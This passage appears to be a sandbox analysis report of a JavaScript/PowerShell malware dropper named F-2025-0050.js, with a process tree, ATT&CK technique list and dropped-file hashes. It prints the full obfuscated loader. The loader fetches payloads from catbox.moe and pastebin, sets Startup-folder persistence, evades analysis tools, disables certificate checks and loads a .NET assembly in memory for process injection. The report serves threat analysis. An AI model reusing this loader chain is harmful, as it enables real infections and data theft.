'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4AC4ARw' + [char]66 + 'lAHQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACkAKQA7AHIAZQ' + [char]66 + '0AHUAcg' + [char]66 + 'uACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAOw' + [char]66 + '9ADsAJA' + [char]66 + 'iAGoAcA' + [char]66 + 'tAGwAIAA9ACAAKAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'wAGEAcw' + [char]66 + '0AGUAYg' + [char]66 + 'pAG4ALg' + [char]66 + 'jAG8AbQAvAHIAYQ' + [char]66 + '3AC8AYg' + [char]66 + 'ZAHIAUg' + [char]66 + 'QAHMANQ' + [char]66 + 'NACcAIAApADsAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAPQAgACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACQAYg' + [char]66 + 'qAHAAbQ' + [char]66 + 'sACAAKQAgADsAJA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZw' + [char]66 + 'iAGEAcw' + [char]66 + 'lACAAPQAgACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XADsAIAAkAHAAUA' + [char]66 + 'DAGwAVwAgAD0AIA' + [char]66 + 'CAGEAcw' + [char]66 + 'lAE0AeQA7ACQAcA' + [char]66 + 'QAEMAbA' + [char]66 + 'XACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'jAFoATg' + [char]66 + 'xAGYAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgACcAVQ' + [char]66 + 'UAEYAOAAnACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATw' + [char]66 + 'DAEoATA' + [char]66 + 'TACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwApACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAgAD0AIA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAOwAkAGwAbQ' + [char]66 + 'JAE8AYQAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAEkAeg' + [char]66 + 'qAHYAZAAgACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAGMAWg' + [char]66 + 'OAHEAZgAgACkAIAA7ACQASQ' + [char]66 + '' + [char]66 + 'AHkAWQ' + [char]66 + 'wACAAPQAgACQAbA' + [char]66 + 'tAEkATw' + [char]66 + 'hAC4ARA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kAEQAYQ' + [char]66 + '0AGEAKAAgACQASQ' + [char]66 + '6AGoAdg' + [char]66 + 'kACAAKQAgADsAJA' + [char]66 + 'WAGcAdg' + [char]66 + 'LAGEAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAuAEcAZQ' + [char]66 + '0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAJA' + [char]66 + 'JAEEAeQ' + [char]66 + 'ZAHAAKQA7ACQAVg' + [char]66 + 'nAHYASw' + [char]66 + 'hACAAfAAgAE8AdQ' + [char]66 + '0AC0ARg' + [char]66 + 'pAGwAZQAgAC0ARg' + [char]66 + 'pAGwAZQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'PAEMASg' + [char]66 + 'MAFMAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAA9ACAAJwAkAHQAZg' + [char]66 + 'ZAEkAbwAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnACcAZA' + [char]66 + 'sAGwAMAAyAC4AdA' + [char]66 + '4AHQAJwAnACkAIAA7ACQAcg' + [char]66 + '5AGEAZQ' + [char]66 + 'HACAAPQAgACgARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + '0AGYAWQ' + [char]66 + 'JAG8AIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATw' + [char]66 + 'NAEcAeA' + [char]66 + 'FACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEUAQQ' + [char]66 + 'UAFYAaAAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'FAEEAVA' + [char]66 + 'WAGgAIAApAC4AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'PAE0ARw' + [char]66 + '4AEUAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'lAEoATA' + [char]66 + 'ZAHgAZg' + [char]66 + 'GAHEALw' + [char]66 + '3AGEAcgAvAG0Abw' + [char]66 + 'jAC4Abg' + [char]66 + 'pAGIAZQ' + [char]66 + '0AHMAYQ' + [char]66 + 'wAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQAYwA6AFwAdw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAG0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AC4Abg' + [char]66 + 'lAHQAXA' + [char]66 + 'mAHIAYQ' + [char]66 + 'tAGUAdw' + [char]66 + 'vAHIAaw' + [char]66 + 'cAHYANAAuADAALgAzADAAMwAxADkAXA' + [char]66 + 'hAGQAZA' + [char]66 + 'pAG4AcA' + [char]66 + 'yAG8AYw' + [char]66 + 'lAHMAcwAzADIAJwAnACAAKQAgACkAOwAnADsAJA' + [char]66 + 'wAEwAbA' + [char]66 + 'VAE8AIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE8ATQ' + [char]66 + 'HAHgARQAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAcA' + [char]66 + 'MAGwAVQ' + [char]66 + 'PACAAOw' + [char]66 + '9ADsA';$SUopR = $SUopR.replace('革','B') ;$SUopR = [System.Convert]::FromBase64String( $SUopR ) ;;;$SUopR = [System.Text.Encoding]::Unicode.GetString( $SUopR ) ;$SUopR = $SUopR.replace('%DCPJU%','C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js') ;powershell $SUopR
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qNSnG = $host.Version.Major.Equals(2);If ( $qNSnG ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$fcyzy = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$KhLaK = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $KhLaK ) {$fcyzy = $menos ;}else {$fcyzy = ($fcyzy) ;};$tzxdf = ( New-Object Net.WebClient ) ;$tzxdf.Encoding = [System.Text.Encoding]::UTF8 ;$tzxdf.DownloadFile($fcyzy, ($fbKNY + '\Upwin.msu') ) ;$rHWrT = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js' -Destination ( $rHWrT + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$bjpml = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$pPClW = $webClient.DownloadString( $bjpml ) ;$Stringbase = $pPClW; $pPClW = BaseMy;$pPClW | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$OCJLS = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$lmIOa = New-Object System.Net.WebClient ;$lmIOa.Encoding = [System.Text.Encoding]::UTF8 ;$Izjvd = ( Get-Content -Path $cZNqf ) ;$IAyYp = $lmIOa.DownloadData( $Izjvd ) ;$VgvKa = [System.Text.Encoding]::UTF8.GetString($IAyYp);$VgvKa | Out-File -FilePath $OCJLS -force ;$OMGxE = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$OMGxE += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$OMGxE += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$OMGxE += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$OMGxE += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''eJLYxfFq/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$pLlUO = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$OMGxE | Out-File -FilePath $pLlUO -force ;powershell -ExecutionPolicy Bypass -File $pLlUO ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
4890f923938835f2e2fa30d78e321eb3

SHA1
2cdfcc7b1d6125cb1fca59699b604184b3e27e57

SHA256
4336b7ab81708232713bd93cdeb82ff4a67bd0e60c9c1125cd458dc7f4d8b0b0

SHA512
82b85ad5950a9b2ed84c238c13764e623e004778d09315be47252a33a9154c31747667836d8907e608d3e385458b508c8e3606dd5df41c4ac1e89fea129e7c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
f0123d2548a8c68ccdadbe6bad4f5791

SHA1
dc40515c7f25c2ad6473c9892981c5abd0914da0

SHA256
90423e6c079d708b69f3440e6270e37818a363af97007b14daf9c6748beca7b7

SHA512
cf7a489818c27cded2ac9a8b183527f207dca714500adb704e3837c00f0c3a41e0a1f58d2d0482ffc5e58916fec1dbfb2642694ea717b854cf00c53892072d8f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
cce6373ae5ca53218b2102cf12ce206d

SHA1
441dabba0fb8f804ab2c877e86852e432efa1353

SHA256
a33481f2f582abe0868cb053ad034eb67ef9df9ea9b26979c4d3a1a5127c4d4e

SHA512
34524ad450d993fb1ff7ad2bb7661bfda6a1dd431dbe0bf8063cf63a1eb55c2d1c94277476e3754fd9ca1fd01ed0c2bc970057831f884df6f1ae93b151b83b71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e684f560084b93f9ab5892463420d645

SHA1
ec4447166ee70c74a47a24ce97a7d71c86e148d6

SHA256
ac70f102d60e81539e98fd6b9880e5a95c980516db45d66af0259233529178e8

SHA512
70c3106696e13794df36a447a7b5d8088d3341e08df1e91815b8006a7f01adf78d3aa489bff0a2cca5fecafb2314061ec62db3ab051f538fcdc86c6e3d2754e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b8ea967ae641eced72cfa259e0f69d4b

SHA1
623184e0a273ac11edac31746bc78632d2640a83

SHA256
97f45b91248b9e821be8c2cb9287d11b0bfc5c4519ed348db126a1e41efd9c6c

SHA512
98feb881d34ca8628bb5fd0e9b1e047fb00f30b4c3d8ac2ca8fe65864eef988d2727f7c5731299695411894a57197fb93be8463ac4b3a1670a9ec387ae85e251

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
05f7412cbcd24e6fa6ae842eb8b84814

SHA1
91a60a3a1d0f08404915c893a8061a4b0aab59a5

SHA256
77944fcd30d9dfd15e236c08c93d5f5eb110d506004ba93a94e9ced6c24838d6

SHA512
0362c57637c47a4029ae0a2bee8d5692fcc772514ec0f0027f65be7f5564159f56b33cf164abc9c392f7386fb039a067f44199f648aa89102be027f2f80c12f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0ccc353b414729126f46ddb1bc6e4769

SHA1
68cc928c71a1fabe6c1073599396f7bc26f80a27

SHA256
1a2e322083faee97edc9081f31c5287cf52f0c4c1afe792736be69359b0d79be

SHA512
8a93b027c52d66eaddc024155fe8da705fb99e012517d2884b27ad081ff474883d47a91e21e83cec341cf87c5df12ba2d90e008dde2482a0b479b64fd502e3c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f64eebaee9c6bb725f13f306c3fce081

SHA1
511ca9e0a2209ff90e1ab1d09dced1486ac9aec0

SHA256
f7b774b37145a7e6a0af0af6228cbd81df9b209c10134978bf81e1875d7d312f

SHA512
e31989cdb001ffd5bb480f3b74f45c8e86f390e9bb5be967155baf3f03014943f94722add1a65dbdff0c62cb1db54c5b7be92308bb692231c84a3d095bd30442

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f867a456cb6b6b1d1d5e03aea7db0d25

SHA1
30aa8928c2bb42f8cdc4f79e8a07402ffdaddee8

SHA256
18d90490d8ce19154e63b647f8df4e1fd29b2722c056729b48d43caa21eb14d5

SHA512
6993add31d97a4a8b32af980a484d485b86cc3eea7e63962ab75589eb8d462f328c9fe8db69d56d2f004b74bf3b990109513e4bb233338861c9a13ef28215f2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
435B

MD5
cbcf1f5543bc530d5f0f7f357f8b11b6

SHA1
35817432ba77aa643a9df038170a6e5124c88d2b

SHA256
8146941f6dce18b0d85795f908b2dc137a809e4fb990e46fd2bd700b874a1788

SHA512
1a28a3ffbd1b07fb0cd47facc7800987cdc8b8790dde06fe0f9d37ac87ccc5a374c5bf7aaa744d3edb578868022cc4429fa05ecca78635ba77a454d23daacf1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e339c0ad3aca4c33b09c7c76ed797a15

SHA1
774102d11041d48de215821b67686774605ae7c8

SHA256
2a0aba6fbf082818826c0ccb8664909831bb8f9e79b92cc2a1b4c08c4932d04d

SHA512
13e14f7de043df47570d8472666037180137a6afcb7b89e3b3164d60be7f322abce69dd5fbb3e203e01d0e23ffe77274358915d646323bb18b4d64520e69ec46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bed47e331c1f64eac1cf3026d169091c

SHA1
46ee9011b9a9a623110544108991a9b34207234a

SHA256
f756a6cdc8937d1dc9fc83a5c6ea84b28c0fbcc3322577acf70770e7877716c3

SHA512
3a7c52953e7c7c1cd58895a49aea8855331e8a4ce1af82e8f11fa483c31627c3eb9be1da5f529c2d2a69296b90c738566d1d1bfed43882ddf8985ff8eea7f77b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ca885ce2b7a4be34acd565a65ea19984

SHA1
8c5d9a4507aab2ef743cd08cee8d0dff7a43bb99

SHA256
c22434ffab6b0df6d60e3f56e0f87e550abd72566622de3d7458ba027ed7378c

SHA512
1cba207f47a009cbc0fdf2a6cf13ef8215e7b28c7d0912006238db9c91dc23c0528e3ba87e02bddc6c7588b346954d4f9bbf426d80159d163318a8b63cc5cebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
35f6396c603b21ffb40a40ec0512b0be

SHA1
c936b196a592045fd76e2bbc18498604dfba9d41

SHA256
470c00c32014b00d2a9e6b2a82093b88ef8ad86d0a136f17a204d0d4eff352fa

SHA512
cd76472c7d10f44fc7e19af460b90d35de619dacaa530d1fb4fe5ca0fac14056dfbe042087e13609743940e363cc430bebf58247496281f139114d7557b0c8c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
01d89dd05c27325bbfe34d7a2bc716ad

SHA1
fa0a5ce95e7e989da44face5a736172aba834ddc

SHA256
52bf1aacc2b2f03b2bbdca40b7eff5e041c8f2892575b3bf5cbaa000a02f71e9

SHA512
d7500eae5877d297fec543b607a1e6764ac07002178e92306de9b5a9cc76d9f42cdaa9a2b086ed1d3174c660afa120228affa80a4fb1ac4a430f7028449e0adb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57fc461561ef8dee0cf6cc6f105346cf

SHA1
98b66b9334fb68cffa88640ae152b0a339f0595f

SHA256
ee427c732718220f2949cd294b61f6472130529ecbc24be727e8bfd28ed2a7f0

SHA512
0e20f1561c638ba31f9a44f75df84b5fa23c1ed8fcf7d71d1ca4df717a88a8b140018697c7041fcbd4799312b7657758bc55892c9b48d8622e697381ba47bd0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_on5c3wc0.d2z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
5B

MD5
3bab25a3e651a9e4a00473d2257b99f9

SHA1
1419458f2696be8daeade77ddad380cd0c871fdb

SHA256
f01a374e9c81e3db89b3a42940c4d6a5447684986a1296e42bf13f196eed6295

SHA512
ae8dc1129b7a81ba70c9512a94a3e9ccd8c159f1817e309198c2babaf5bcb3f7e97f43b54ea4937cbea468bb5a62328fc0c01982aa1b883d8fd6d2e2c58090ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
990B

MD5
640e2a124b8970c86f2342a72f3909ff

SHA1
e9d7fac8b35d85645024590feeb819eccd499f25

SHA256
41acf4dc80869f27222eaea80b806bec31c085c2c7e46a94d517e96fe6c40667

SHA512
64ff05fb1c804d1e8e6071c4232bc7799e2dbd698204fb39c4ddb3bea1d211faf364e4bf508fc13a634d6b0b352b832b26f59d8b81e7a08f288ae57870a8a14d

Download Submit
C:\Users\Admin\Downloads\F-2025-0050.zip

Filesize
7KB

MD5
